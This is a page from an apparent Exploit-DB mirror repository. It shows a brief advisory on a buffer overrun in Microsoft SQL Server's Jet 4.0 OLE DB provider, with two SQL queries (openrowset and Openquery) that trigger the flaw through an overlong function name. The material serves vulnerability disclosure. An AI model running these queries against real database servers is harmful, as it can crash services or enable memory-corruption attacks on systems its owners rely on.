bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/22576.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

12 lines
No EOL
570 B
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/7541/info
Microsoft SQL Server is prone to an exploitable buffer overrun vulnerability via the Jet Database Engine. This can occur while the JET 4.0 OLE DB data provider is querying data supplied via a remote source and is due to insufficient bounds checking of parameters of heterogeneous or ad hoc query methods.
select * from openrowset('microsoft.jet.oledb.4.0','c:\anydatabase.mdb';'admin';'','select XXX...()')
or
select * from Openquery(SomeJet40LinkedServer,'Select XXX...()')
(where XXX... is more than 276 chars)
Reference in a new issue View git blame Copy permalink